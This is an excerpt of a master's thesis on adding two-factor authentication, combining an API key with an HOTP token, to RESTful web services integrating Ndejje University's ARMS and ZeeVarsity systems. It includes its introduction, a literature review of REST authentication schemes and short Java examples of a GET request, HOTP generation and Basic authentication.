Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism


Master's Thesis, 2019

84 Pages, Grade: 15.0


Excerpt


Table of Contents

List of Tables

List of Figures

List of Abbreviations

Abstract

CHAPTER ONE
GENERAL INTRODUCTION
1.0 Introduction
1.1 Background of the study
1.2 Statement of the Problem
1.3 Objectives of the study
1.3.1 Main objective
1.3.2 Specific objectives
1.4 Research Questions
1.5 Scope
1.6 Significance of the study
1.7 Justification of the study
1.8 Definition of Key terms
1.9 Conceptual framework

CHAPTER TWO
LITERATURE REVIEW
2.0 Introduction
2.1 Security Implementations in REST
2.2 Security Schemes for REST-based Web Services
2.2.1 HTTP Basic Authentication
2.2.2 HTTP Digest Authentication
2.2.3 API-Keys
2.2.4 OAuth (Token-based Authentication) and OpenID Connect
2.2.5 ID-based Authentication (IBA)
2.3 Vulnerabilities to RESTful Web Services
2.3.1 Cross-Site Scripting (XSS) attack
2.3.2 Injection Attacks
2.3.3 Cross-Site Request Forgery (CSRF)
2.3.4 Insecure Direct Object Reference
2.3.5 Parameter Tampering
2.4 SOAP Security Mechanisms
2.5 Vulnerabilities to SOAP
2.6 Comparison of REST-Security and SOAP-Security Mechanisms
2.7 API Management
2.7.1 Secure, Reliable and Flexible Communication
2.7.1.1 API Gateway
2.7.2 API Lifecycle Management
2.7.3 API Auditing, Logging and Analytics
2.8 Conclusion

CHAPTER THREE
RESEARCH METHODOLOGY
3.0 Introduction
3.1 Research design
3.2 Area of study
3.3 Sample and Sampling technique
3.4 Data collection methods and instruments
3.4.1 Interviews (Group discussions)
3.4.2 Document Review
3.5 Data Analysis
3.6 Design and implementation
3.6.1 Design
3.6.2 Development
3.7 Quality Control Methods
3.7.1 Development
3.7.2 Data Collection
3.8 Test and Validation
3.8.1 Test
3.8.2 Validation
3.9 Limitations of the study

CHAPTER FOUR
DESIGN, ANALYSIS AND DISCUSSION OF FINDINGS
4.0 Introduction
4.1 Demographic Information
4.2 System Usage and Efficiency
4.3 Document Analysis
4.3.1 WS-Security for REST services
4.3.2 Cipher Text Stealing
4.3.3 HOTP: HMAC-Based One-Time Password Algorithm
4.4 Existing Systems and Security mechanism
4.5 System and Security Requirements
4.6 Functional Requirements
4.6.1 Interoperability
4.6.2 Registrations and Adding of Users (Students, staff)
4.6.3 System logs and tracking
4.7 Non Functional Requirements
4.8 Implementation Specific Requirements
4.9 Design
4.9.1 Architectural Diagram
4.9.2 Sequence Diagram
4.9.3 Class diagram
4.9.4 State Diagram
4.10 Implementation
4.10.1 Implementation of HMAC-HOTP in REST
4.10.2 Hashed One Time Password
4.10.3 HOTP Validator
4.10.4 Token Sharing in REST
4.11 Testing
4.12 Validation of the Multi-Factor Authentication

CHAPTER FIVE
SUMMARY, CONCLUSION AND RECOMMENDATIONS
5.0 Introduction
5.1 Summary of Findings
5.2 Conclusion
5.3 Recommendations
5.4 Suggestions for Further Research

References

Appendices

Dedication

I dedicate this project to God Almighty my creator, my strong pillar, my source of inspiration, wisdom, knowledge and understanding. He has been the source of my strength throughout this program and on His wings only have I soared. I also dedicate this work to my parents, Mr. and Mrs. Matovu, who have always believed in my abilities to succeed in all my endeavors; My wife, Lydia Kiirya who has encouraged me all the way and whose encouragement has made sure that I give it all it takes to finish that which I have started; My child Josephine Naluyima Alouise who has been affected in every way possible by this quest; My good friend, John Bosco Mawebe for your selfless support towards anyone who sought your God-given intellect during our studies.

Thank you. My love for you all can never be quantified. God bless you all.

Acknowledgement

First and foremost, I would like to thank God the Almighty for giving me the strength, knowledge, ability and opportunity to undertake this research study and to persevere and complete it satisfactorily. Without his blessings, this achievement would not have been possible.

Special thanks and gratitude to:

Mr. Kasozi Brian, my supervisor, for providing his invaluable guidance, comments and suggestions throughout the course of the project. His special interest and knowledge in Web services enabled him to give me the right guidance and also, provided me with much needed motivation.

Mr. Yiga Stephen for starting me off on this research process and constantly motivating me to work harder.

RUFORUM (Regional Universities Forum for Capacity Building in Agriculture) in conjunction with Ndejje University for partially sponsoring this master's course.

My Parents and betrothed, Lydia for always being supportive of my education.

My friends, especially Mr. Mawebe John Bosco and Mrs. Prossy Mbabazi. John Bosco for always being there for me especially in times when I was too weak physically and mentally to attend to my academic obligations. Prossy for spearheading our group discussions and being my chauffeur after those grueling Friday classes. May the God Almighty bless you.

List of Tables

Table 1: ISR for REST SECURITY

Table 2: Penetration Testing Report

List of Figures

Figure 1: Research Conceptual Framework

Figure 2: SOAP Web Service Security Stack (Gorski, et al., 2014)

Figure 3: Proposed RESTful Web Service Security Stack (Gorski, Iacono, Nguyen and Torkian, 2014)

Figure 4: API Management Capabilities (De, 2017)

Figure 5: API Management Platform Services (De, 2017)

Figure 6: API Gateway Capabilities (De, 2017)

Figure 7: Demography based on Gender of Respondents

Figure 8: Client-Server Architecture - Digest Authentication

Figure 9: Types of Requirements (Perforce, 2014)

Figure 10: RESTful Web Service Architecture

Figure 11: Sequence Diagram for Two-Factor Authentication Using HOTP in REST

Figure 12: Token Generator Sequence Diagram

Figure 13: Class Diagram for Token Generation

Figure 14: State Diagram for Multi-Factor Authentication Mechanism

Figure 15: HOTP Flow Chart

Figure 16: HOTP View

List of Abbreviations

[Illustration not included in this excerpt]

Abstract

To date, organizations such as Ndejje University are still running autonomous legacy systems alongside newer, modern web-based systems. These organizations choose this way of operation as they fear that a direct system changeover can disrupt an organization’s daily operations. Additionally, some organizations realize that they still need the business-critical functionalities embedded within millions of lines of code in their legacy systems. However, keeping autonomous systems within an organization is counterproductive, as these systems do not support interoperability. Therefore, a need arises for autonomous systems to share data and information, and this can be achieved through systems integration. RESTful web services provide a cost-effective and efficient alternative for tight business process integration. With RESTful web services, legacy systems can be integrated with newer web-based or mobile user interfaces. However, RESTful web services currently do not provide secure integration as they have no specified security standards. Therefore, they are not recommended for use in enterprise-level systems which require strong security implementations. RESTful web services’ stateless nature, their reliance on HTTP and their use of URIs to transfer sensitive data have led to security breaches. The security challenges are mostly experienced in REST’s authentication process. In this study, the researcher explored the different security mechanisms/schemes currently available in RESTful web services and determined their strengths and weaknesses. With Ndejje University’s two major autonomous information systems taken as the basis for this study, a qualitative study was undertaken to determine how systems at Ndejje University are developed, implemented and operationalized. The qualitative approach also explored user experiences with the University’s information systems, with the aim of rallying support for the integration. From the data collected through interviews and document reviews, the researcher was able to define the requirements for an improved authentication mechanism, which was designed, implemented and tested. The two-factor authentication mechanism developed is based on the existing API-key authentication mechanism and the HOTP algorithm. This authentication mechanism grants the communicating services/applications access only after they successfully present two or more pieces of evidence, that is, the API-key and an access token generated by the service server based on the HOTP algorithm. The developed security mechanism is able to identify and block unauthentic URIs and traffic received in RESTful web services. The two-factor authentication mechanism is an improvement on most existing mechanisms, which rely on a single factor to authenticate the client service/application to the server service/application before responding to requests by sending the requested resource.

CHAPTER ONE

GENERAL INTRODUCTION

1.0 Introduction

This dissertation focused on Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism. Ndejje University’s two major information systems, ARMS and ZeeVarsity, were taken as the case study for secure integration using a RESTful web service.

It was noted that evolving legacy enterprise systems into a lean system architecture has been on the agendas of many organizations in order to deliver timely digital solutions to users to gain a competitive advantage (Habibullah, Liu and Tan, 2018; Lu, Glatz and Peuser, 2019). Most legacy systems are based on monolithic architectures like the tiered architecture where everything is developed and deployed as a single artifact. This makes the initial development and deployment easy and simple. However, as the code-base grows in size, the development process becomes slower, difficulties are experienced in the continuous deployments, and there are limited scaling possibilities (Kalske, 2017).

The first generation of the Service-Oriented Architecture (SOA) was touted as a solution to the challenges experienced within monolithic applications. SOA, unlike monolithic approaches, implemented objects from object-oriented languages as services, hence the birth of the term web services (Dragoni, et al., 2017). A web service is a software module offered by a service provider through the Web (Tihomirovs and Grabis, 2016). However, SOA defined difficult and unclear requirements for services, e.g. discoverability and service contracts, which hindered its adoption. Additionally, SOA’s slow adoption was attributed to its over-reliance on heavyweight middleware and its association with the SOAP web services protocol (Jamshidi, et al., 2018).

SOAP (Simple Object Access Protocol) was developed as an alternative to previous technologies such as CORBA (Common Object Request Broker Architecture), RMI (Remote Method Invocation) and DCOM (Distributed Component Object Model), which were used in earlier distributed monolithic applications (Tihomirovs and Grabis, 2016; Mumbaikar and Padiya, 2013). To ensure data transport in SOAP, protocols such as SMTP (Simple Mail Transfer Protocol), FTP (File Transfer Protocol) and HTTP (Hypertext Transfer Protocol) are used, while the data is sent in XML (eXtensible Markup Language) format. The amount of data sent by SOAP can cause performance problems because, when forming the message, SOAP adds an additional header and body parts to the message (Tihomirovs and Grabis, 2016). This makes SOAP a heavyweight communication technology known for producing network traffic and causing higher latency (Mumbaikar and Padiya, 2013).

Recent advances in legacy system evolution favor the Microservices Architecture (MSA), which not only significantly reduces the complexity involved in deploying enterprise systems, but also enhances the availability of services to system users (Habibullah, Liu and Tan, 2018). Dragoni et al. (2017) describe MSA as the second iteration on the concept of SOA. MSA comprises small services, each running in its own process and communicating via lightweight mechanisms, typically Representational State Transfer (REST) and HTTP. Each micro-service is expected to implement a single business capability, in fact, a very limited system functionality, bringing benefits in terms of service scalability and simplicity (Bucchiarone, et al., 2018).

REST is considered to be a lighter alternative to the heavy SOAP protocol, which consumes more bandwidth and resources (Tihomirovs and Grabis, 2016). However, REST-based Web Services provide no pre-defined security protection methods (Lee and Mehta, 2013), and Adamczyk et al. (2011) state that REST is only known to ensure basic message-level security using HTTPS. More complex capabilities such as signatures, encryption, or federation (enabling a third party to broker trust of identities) cannot be supplied by HTTP alone, yet REST heavily relies on HTTP.

1.1 Background of the study

In today's business environment, business processes are more likely to be dynamic, distributed, and collaborative, making it necessary for enterprises to adapt business processes more often and integrate processes across organizational boundaries with their business partners (Lee and Mehta, 2013). Furthermore, organizations also need to expose business-critical functionalities embedded within millions of lines of code in their legacy systems and integrate these functionalities with new web-based or mobile user interfaces. The REST technology provides a cost-effective and efficient alternative to support tight business process integration (Lee and Mehta, 2013). Moreover, the majority of Internet of Things (IoT) and Web Service companies like Google and Amazon are currently developing their Web interfaces based on RESTful Web Services (Lee, Jo and Kim, 2017).

REST is an abstract architectural style for designing distributed services systems that scale over the large public Internet (Iacono, Nguyen and Gorski, 2019; De Backere, et al., 2014).

REST constrains an architecture to the client-server model, which is a request-response communication flow. REST specifies constraints such as resource identification (addressability), uniform interface, stateless interactions, hypermedia as the engine of application state (HATEOAS), and self-descriptive messages (Nguyen, Tolsdorf and Iacono, 2017). With RESTful Web services’ statelessness, every request is dependent only on itself. One simply has to examine the request to gather all the details concerning it. Statelessness also means that the service is more reliable, because there are fewer steps where something can go wrong. In distributed services, the lack of state means that there is no overhead to keep the different servers consistent (De Backere, et al., 2014).

The REST-based approach to Web services is easier to implement since its design heavily relies on HTTP, which is a stateless communication protocol (Lee and Mehta, 2013). REST uses Uniform Resource Identifiers (URIs) to identify resources. A resource is anything that can be named as a target of hypertext, for example, a file or a script (Adamczyk, et al., 2011). REST also uses the GET, PUT, POST and DELETE actions to retrieve, update, create, and delete resources remotely through Web servers. HTTP status codes are used to send feedback to the client. All these actions are already provided for by HTTP, thereby accelerating the adoption of REST in Web-based environments. Additionally, JSON (JavaScript Object Notation) or XML is used in REST to transport or exchange messages between services as well as between clients and servers (Lee and Mehta, 2013).
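
To make this interaction concrete, the following minimal sketch (in Java, one of the technologies considered in this study) retrieves the JSON representation of a resource with a GET request. The endpoint https://api.example.edu/students/123 is a hypothetical URI used purely for illustration.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class RestGetExample {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();

        // Hypothetical resource URI; any RESTful service exposing a student resource looks similar.
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://api.example.edu/students/123"))
                .header("Accept", "application/json") // ask for a JSON representation
                .GET()                                // retrieve the resource
                .build();

        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());

        // The HTTP status code carries the outcome (200 OK, 404 Not Found, and so on).
        System.out.println("Status: " + response.statusCode());
        // The body holds the JSON representation of the resource.
        System.out.println("Body: " + response.body());
    }
}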

When considering REST for the design of service systems of any kind, the general security demands of SOA apply, and since SOAP is the dominant technology for implementing SOA-based systems, its security stack can serve as a reference for REST (Iacono, Nguyen and Gorski, 2019). SOAP uses the standardized Web Services Security (WS-Security) to ensure basic security services such as confidentiality and integrity of messages. WS-Security is based on XML encryption and XML signatures. The SOAP security stack also includes:

i) WS-Trust for establishing and brokering trust relationships between service endpoints;
ii) WS-Federation which provides authorization management across organizational and trust boundaries;
iii) WS-Authorization which provides a description of the authorization management;
iv) WS-Privacy which covers privacy constraints;
v) WS-SecurityPolicy which specifies how constraints and requirements in terms of security are defined for SOAP messages; and
vi) WS-SecureConversation which expands the security mechanisms for a conversation between two communication partners.

But even with the protection provided by WS-Security, SOAP-based Web services are still prone to the same attacks that can be launched on any standard Web application such as SQL injections, capture and replay attacks, buffer overflows, denial-of-service attacks and improper error handling (Lee and Mehta, 2013). Additionally, newly found attacks including XML external entity attacks, XML bombs, malicious SOAP attachment, and XPath injections are some of the other vulnerabilities of SOAP-based Web services.

Just like SOAP-based web services, RESTful Web services are prone to the same threats that all other Web services face. A recent comparison of the available state-of-the-art REST security mechanisms has revealed that the available technologies are inhomogeneous and contain many vulnerabilities, or do not comply with the REST constraints (Iacono, Nguyen and Gorski, 2019). Therefore, RESTful Web services are in need of a better security stack than that offered by SOAP-based Web services. But at the moment, the available REST-based security stack is scarce in comparison to the SOAP-based security stack. Some standards related to the authorization of service invocations (such as OAuth) and drafts on identity federation are currently available. However, the fundamental message security layer (the counterpart of WS-Security in SOAP) is nonexistent, along with the higher-order security concepts including trust, secure conversation and many others (Iacono, Nguyen and Gorski, 2019). In addition, De Backere et al. (2014) state that popular security mechanisms such as OAuth and OpenID violate the strict principles of REST since they are stateful, meaning that they rely on sessions.

Additionally, many IoT and Web service companies are still confronting challenges in implementing the stateless concept of REST due to problematic authentication processes (Lee, Jo and Kim, 2017). The stateless concept of REST implies that the server does not save the client's status, and consequently, the server does not use the concept of sessions. Without the concept of sessions, an authentication problem arises in RESTful Web Services, as a client authentication process is necessary whenever servers receive client requests.

Newer methods such as the ID-based Authentication (IBA) proposed by Lee, Jo and Kim (2017) have implemented the stateless concept along with ensuring authenticity, integrity and confidentiality of HTTP messages. However, these implementations do not comply with all the REST constraints and are still vulnerable to attacks such as replay attacks due to their use of URIs in authentication processes. According to De Backere et al. (2014), the use of URIs to transfer important data may result in privacy breaches as data is not anonymized. Therefore, with REST increasingly adopted in critical enterprise web applications today, priority has to be placed on ensuring appropriate security measures in RESTful Web services (Iacono, Nguyen and Gorski, 2019).

Current State of Ndejje University’s Information Systems

Ndejje University was the first private university in Uganda. Set up in 1992, the University has two campuses, in Luweero and Kampala. Ndejje University currently has two major autonomous information systems, that is, Academic Records Management System (ARMS) and ZeeVarsity. It is to be noted that no known security breach has ever been recorded for either system. Below, we describe how they currently operate.

i) ZeeVarsity

ZeeVarsity is a cloud-based ERP for institutions of higher learning. ZeeVarsity is based on a micro-services architecture that consolidates all the processes of any institution of higher learning. The system is publicized as a solution that offers online services such as application and admission, tuition payment management, registration, results and transcripts processing, course information management and timetabling. ZeeVarsity can be accessed through multiple channels such as web apps, mobile apps (both Android and iOS), USSD and many others. The system currently boasts an enviable client list which includes some of the leading public and private universities in Uganda.

The most impressive functionality of ZeeVarsity is its Online Payment Management module, ZeePay, which offers real-time reconciliation with some of the leading banks in Uganda such as DFCU, Centenary, Barclays, Stanbic and Ecobank. Additionally, ZeePay’s robust API is engineered to integrate securely with mobile-commerce platforms such as Mobile Money.

However, at Ndejje University, most of the modules offered by ZeeVarsity remain underutilized. Only the ZeePay module has gained notable use, though full module utilization is still a long way off. The modules that are intended to handle the academic processes remain unused by academic staff, who prefer using ARMS, which was entirely tailored to the Ndejje University academic processes. It is to be noted that the academic modules in ZeeVarsity are yet to be customized to Ndejje University’s academic processes.

ii) ARMS (Academic Records Management System)

ARMS is a 4-tier Web-based system which supports all academic records management operations and functions at the University. The system’s server is housed in the data center of one of Uganda’s leading telecommunications companies to ensure its 24/7 availability. ARMS is secured by HTTPS and a complex encryption scheme applied to its database. ARMS is currently used in all seven faculties of the University to manage academic records for over 6,000 enrolled students as well as the University’s alumni. Every student at the University has an account on the system where they can track their course information and academic progress. Students can print out their academic progress report (results slip).

Management staff make use of the Staff Engine, which applies customizable Role-based Access Control for authentication of users depending on their jurisdiction. Users of this module include Examinations Officers, Lecturers, Heads of Department, Faculty Deans, the Academic Registrar and the Deputy Vice Chancellor. Users can: view, import, edit, approve or publish results; analyze progressive assessment or weighted scores for individuals or student groups; manage exemptions and credit transfers; and access academic progress reports for individuals or particular student groups, among others. The system also supports the Academic Registrar Department in the processing of relevant academic documents for students such as academic testimonials and transcripts.

However, the other modules of ARMS such as the admission portal, online registration and finance module, which were developed later, remain unused. The development of these modules was so delayed that the University management became frustrated and decided to acquire the ZeeVarsity system, which was marketed as an integrated system for institutions of higher learning.

In addition, the University subscribes to the Consortium of Uganda University Libraries, which provides access to various e-library resources such as EBrary, Wiley Online Library, Ebscohost, Cambridge University Press and Springer e-books, among others.

In order for a student to access the services offered by any of the diverse University information systems, an account has to be created for them by a member of staff, on each of those information systems. Then, the initial credentials to those accounts have to be shared with the student. These interactions are mainly accomplished through physical means. Therefore, a student has to maintain credentials to several information systems, which is quite difficult for any individual today.

Conclusion

In conclusion, there was a need for the University to integrate its information systems in order to promote interoperability between these formerly autonomous legacy systems. The researcher proposed the development of a RESTful web service to enable the interoperation of these two systems, due to its simplicity and scalability. However, REST is still faced with a number of security challenges, not limited to cross-site scripting and parameter tampering. Therefore, there was a need to enhance the current security mechanisms applied in RESTful web services in order to facilitate the secure integration of Ndejje University's information systems. RESTful web services’ most obvious weakness lies in their use of plain-text URIs in their authentication processes.

1.2 Statement of the Problem

Organizations have been running autonomous legacy systems, but due to the development of and change in technology, such organizations have been forced to embrace current technological trends, for example micro-services, cloud computing and mobile computing. However, this requires integration of the different systems, some of which might be external to the organization. Companies have integrated their systems using the RESTful web service style because of its scalability and lower complexity compared to SOAP (Gorski, Iacono and Nguyen, 2014). Organizations share very sensitive information within their systems, and this information is critical for business survival and maintaining competitive advantage. However, the REST architectural style is still not secure, as it faces a number of security threats which include, but are not limited to, cross-site scripting, parameter tampering and replay attacks (Lee, Jo and Kim, 2017; Iacono, Nguyen and Gorski, 2019). These types of attacks target and attempt to exploit the authentication mechanism that a service uses to verify the identity of a service or application. Such attacks can lead to identity theft and the leaking of confidential information, which might cause the organization to lose its competitive advantage and money (Laudon and Laudon, 2007). The authentication process is a crucial component in securing a software application or system. Hence, securing the authentication process itself becomes an even more important and imperative task, because the repercussions of a successful penetration of an authentication system can be seriously harmful. Therefore, this study aimed at developing an enhanced multi-factor authentication mechanism in REST that can verify the authenticity of client applications and requests.

1.3 Objectives of the study

1.3.1 Main objective

The main objective of this study was to implement a multi-factor authentication mechanism in RESTful web services capable of identifying and blocking unauthentic Uniform Resource Identifiers and traffic received from client applications.

1.3.2 Specific objectives

1. To study and review existing literature related to RESTful web services and information security thus identifying loopholes and determining requirements for an improved authentication mechanism in RESTful web services.
2. To design an improved authentication mechanism in web services based on the requirements identified in the literature review and hence coming up with blueprints of an improved authentication mechanism for REST.
3. To implement the logical designs of the improved secure authentication mechanism for RESTful web services.
4. To test and validate the developed authentication mechanism to ensure that it secures RESTful web services and improves their security.

1.4 Research Questions

1. How is security implemented in RESTful web services?
2. How does the service development style or standard affect the service security?
3. How can security be improved in RESTful web services?

1.5 Scope

1.5.1 Functional Scope

The study took into consideration the different web service architectures, with the main focus on RESTful web services. Further, the security and implementation of RESTful web services were critically analyzed to identify loopholes and thus provide possible solutions. The study employed different technologies, which include Hypertext Preprocessor (PHP) and Java technologies. Emphasis was put on AJAX, since most applications consuming RESTful web services normally run AJAX on the client side. The study also reviewed how HTTP works, mainly focusing on the three major HTTP methods (GET, POST, PUT) that are always deployed in RESTful web services.

1.5.2 Geographical Scope

The study focused mainly on the different legacy systems at Ndejje University. The University has its main campus at Ndejje, Luweero District, and another campus at Mengo, Kampala District. The study was carried out at the Kampala campus since most of the systems are housed and hosted there.

1.6 Significance of the study

Ndejje University students and staff will be able to access all University electronic services using one single sign-on endpoint offered by the developed RESTful Web service. The electronic services include both academic and financial services currently offered by two systems built on different architectures.

The researcher’s developed authentication mechanism can be implemented in REST-based Web service applications especially in enterprise systems to offer stronger security.

Additionally, this project can be used as a guide or as a reference by organizations with an interest in securely integrating their various information systems, which may include both modern and legacy systems. Many legacy systems still contain sensitive information and functionalities which are vital for business competitiveness. Migration of such information is typically difficult, tedious and prone to data loss. Some functionalities available in legacy systems are difficult to implement in modern systems. Therefore, integration of newly developed systems with existing legacy systems using REST may be the ideal solution for organizations that desire no disruptions in their daily operations when a new system is introduced.

1.7 Justification of the study

In order to maintain a competitive advantage over their competitors, organizations need to develop applications which are omnipresent with their consumers (Thomas and Gupta, 2016). Consumers demand an application architecture that offers access through multiple channels such as web apps, mobile apps, social media, notifications or email, and many others (Thomas and Gupta, 2016). The MSA is the trending architecture for developing and integrating applications that can offer services to users via diverse endpoints. MSA is commonly implemented using REST and HTTP (Bucchiarone et al., 2018).

In addition, many organizations are still running various autonomous legacy systems that contain sensitive information and business-critical functionalities that are vital for business survival. Therefore, there is a need to integrate these systems with new Web-based or mobile user interfaces. REST technology supports this business process integration (Lee and Mehta, 2013). Furthermore, RESTful HTTP forms the basis in emerging technologies such as the fifth generation of mobile communication systems (5G) and IoT (Iacono, Nguyen and Gorski, 2019).

However, REST is known to provide only basic message-level security using HTTPS with no support for more complex capabilities such as signatures, encryption or federation (Iacono, Nguyen and Gorski, 2019). Lee, Jo and Kim (2018) specifically pinpoint REST’s problematic authentication process as the major challenge being confronted by developers today.

Therefore, the need for better security mechanisms for RESTful web services aimed at improving the authentication process had become apparent. With most of the existing REST security mechanisms like the API key and HTTP Digest Authentication relying on a single factor to authenticate client requests, the researcher developed a two-factor authentication mechanism to improve the REST authentication process. The two-factor authentication mechanism requires the communicating services/applications to be granted access only after successfully presenting two pieces of evidence.
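
To illustrate how such a second factor can be derived, the sketch below implements the HMAC-based one-time password computation of HOTP (RFC 4226) in Java. It is a simplified sketch under stated assumptions: the shared secret, counter handling and digit length are placeholders, and the actual validator and token-sharing logic of the developed mechanism are described in Chapter Four.

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;

public class HotpSketch {

    // Computes an HOTP value as defined in RFC 4226: HMAC-SHA-1 over the counter, then dynamic truncation.
    static int hotp(byte[] sharedSecret, long counter, int digits) throws Exception {
        byte[] counterBytes = ByteBuffer.allocate(8).putLong(counter).array(); // 8-byte big-endian counter

        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(sharedSecret, "HmacSHA1"));
        byte[] hash = mac.doFinal(counterBytes);

        // Dynamic truncation: 4 bytes starting at the offset given by the low nibble of the last byte.
        int offset = hash[hash.length - 1] & 0x0F;
        int binary = ((hash[offset] & 0x7F) << 24)
                   | ((hash[offset + 1] & 0xFF) << 16)
                   | ((hash[offset + 2] & 0xFF) << 8)
                   |  (hash[offset + 3] & 0xFF);

        return binary % (int) Math.pow(10, digits); // e.g. a 6-digit one-time password
    }

    public static void main(String[] args) throws Exception {
        byte[] secret = "12345678901234567890".getBytes(); // placeholder shared secret (RFC 4226 test value)
        // Client and server derive the same token from the shared secret and counter; the server
        // grants access only when the API-key AND a matching HOTP value are presented.
        System.out.println("OTP for counter 0: " + hotp(secret, 0, 6));
    }
}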

1.8 Definition of Key terms

Service is a reusable software functionality usable by various clients for different purposes enforcing control rules (Cerny, Donahoo and Pechanec, 2017).

A vulnerability is a flaw in the application that stems from coding defects, and causes severe damage to the application upon exploitation (Jimenez, Mammar and Cavalli, 2009).

Data validation is the process of ensuring that a program operates on clean, correct, and useful input data (Ao and Gelman, 2011).

A legacy system is any business critical software system based on outdated technologies that are resistant to modification, but remains in operation within an organization. Legacy systems' failure can have a significant impact on the business (Crotty and Horrocks, 2016).

1.9 Conceptual framework

The conceptual framework is the researcher’s understanding of how the particular variables in the study connect with each other (Regoniel, 2015). The study focused on improving the security mechanisms of REST. A number of RESTful service threats were reviewed and the relationship between the threats and security measures was determined. The research covered how URIs are generated and how data is passed from one entity to another. This helped determine the requirements for an improved security mechanism in REST-based services.

[Illustration not included in this excerpt]

Figure 1: Research Conceptual Framework

Figure 1 shows the conceptual framework that guided the study. REST faces a number of security threats. However, this study focuses on the most common and harmful threats: cross-site scripting (XSS), which might even lead to identity theft; cross-site request forgery; injection attacks; insecure direct object references; parameter tampering; and others. All these factors affect the security of RESTful Web services. Therefore, the study also considers the different components that make up REST, since these components are the ones affected by the identified threats. These components include the URI, the authentication token, the data and the underlying protocol, HTTP. It should be noted that the listed threats are not the only ones that contribute to the insecurity of REST. Other factors such as poor security policies, social engineering and spoofing can be just as harmful.

CHAPTER TWO

LITERATURE REVIEW

2.0 Introduction

This chapter reviews the literature that was relevant to this study. The literature was obtained from many researchers who have published articles and journal papers related to the main and specific objectives of the study. In this chapter, the researcher focused on the current implementations of REST and SOAP, with emphasis on the security mechanisms available in both. Additionally, vulnerabilities affecting the optimal performance of both approaches to Web services were also reviewed.

2.1 Security Implementations in REST

Security is not taken into account by default in the REST architectural style, but its layered architecture provides many opportunities for implementing it (De Backere, et al., 2014). Since REST is a very general concept, its specifics have to be considered carefully in order to obtain a suitable and seamless security for RESTful Web Services. The term general in this context has to be understood as generic in the sense that the schemes contained in the REST-security framework are not bound to a specific REST-based technology or protocol only, but are applicable to any RESTful technology (Iacono, Nguyen and Gorski, 2019).

The abstract layer of REST and its instantiations should first be taken into account when constructing REST-Security. Simply mapping the concrete WS-Security technologies to construct REST-Security is not feasible, as both reside on different abstraction layers. Since REST represents an abstract model, security components for this architectural style need to be considered and defined on the same abstraction layer as well. Consequently, REST-Security needs to be a general framework composed of definitions, structures and rules on how to protect REST-based systems (Iacono, Nguyen and Gorski, 2019).

Unlike SOAP messages, REST messages are not self-contained. SOAP messages are composed of a header and a body, all encased in an envelope, making one enclosed XML document (Mumbaikar and Padiya, 2013). When the available security mechanisms are applied, both message parts are covered. However, in the case of REST messages, especially RESTful HTTP, meta-data is included in the HTTP header and the resource representation (payload data) inside the HTTP body. Since the HTTP header and body in REST are disjoint, distinct security mechanisms need to be applied in a balanced manner to avoid novel vulnerabilities being exploited in future. Such was the case when JSON gained widespread preference over XML in REST service messages.

JSON had been drafted as an alternative to XML to fill REST’s core message security layer (Gorski, et al., 2014). This was due to REST's independence from particular data types, unlike SOAP's exclusive reliance on XML. XML is one option for REST service messages, as it can be used for protection purposes due to the availability of XML security. But XML's use in REST messages has drawbacks, such as processing overheads due to the verbosity of XML and, more importantly, the missing support in Web browsers, since browsers are a crucial platform for implementing service consumers. Instead, JSON was preferred due to its lightweight form and its support in Web browsers. According to Gorski et al. (2014), the IETF and W3C established working groups in 2011 intending to specify standard JSON security mechanisms that could be used to fill the REST message security layer. But the developed standards offered insufficient protection, since they only provided security services for the payload decoupled from the metadata contained in the application-layer transfer protocol, yet the metadata is equally as important as the payload.

Most of the previous relevant works on REST security have been conducted in relation to basic service message security, with a focus on authentication and authorization. Consequently, when searching for the term REST Security, the results that appear point to implementation-oriented best practices or recommendations by frameworks, companies or other organizations. Some of the notable organizations that have implemented REST-Security mechanisms in their enterprise systems include Google, Hewlett Packard (HP) and Microsoft, who utilize enhanced API-Keys to secure their keys in transit (Gorski, et al., 2014). The most commonly used message security mechanisms in REST are discussed in the following section.

2.2 Security Schemes for REST-based Web Services

Only a few standardized security technologies exist for REST-based web services (Nguyen, Tolsdorf and Iacono, 2017). HTTP Basic and HTTP Digest Authentication are the first two security schemes that were published for web applications. Other security schemes, which include API-Keys, OAuth, OpenID and ID-based Authentication (IBA), have since been implemented. The schemes are briefly discussed below, with emphasis put on the way they operate and their weaknesses. The selection of the discussed security schemes is based on their availability as open standards.

2.2.1 HTTP Basic Authentication

This scheme uses the ID and password of a client to authenticate the client’s request in the HTTP header. When a server requests authentication from a client, the server sends the message “HTTP 401 Not Authorized” with a WWW-Authenticate HTTP header. The client’s ID and password are encoded with Base64 and stored in the HTTP Authorization header. As they are neither encrypted nor hashed, they are usually sent via HTTPS or SSL. However, HTTP basic authentication does not support a logout function. Additionally, due to HTTP basic authentication’s need to store the ID and password, it has security vulnerabilities such as replay attacks, injection attacks, and middleware hijacking (Lee, Jo and Kim, 2017; Iacono, Nguyen and Gorski, 2019).
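
The sketch below shows how a client would attach Basic credentials to a request. The user name, password and endpoint are placeholders, and in practice such a request must be sent over HTTPS, since the credentials are merely Base64-encoded rather than encrypted.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.Base64;

public class BasicAuthExample {
    public static void main(String[] args) throws Exception {
        // Base64-encode "user:password"; this is encoding, not encryption, so TLS is essential.
        String credentials = Base64.getEncoder().encodeToString("alice:secretPassword".getBytes());

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://api.example.edu/results")) // hypothetical endpoint
                .header("Authorization", "Basic " + credentials)
                .GET()
                .build();

        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.statusCode()); // 401 if the server rejects the credentials
    }
}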

2.2.2 HTTP Digest Authentication

This is an advanced version of HTTP basic authentication because it encrypts the client’s ID and password via a hash function such as MD5 (Message Digest algorithm 5). By creating a nonce on the client side, HTTP digest authentication can protect the hash from a rainbow table attack. Also, the timestamp created on the server can protect the message of a client from a replay attack. However, HTTP digest authentication can be attacked via a man-in-the-middle attack, since it does not provide a method for the client to verify the server.

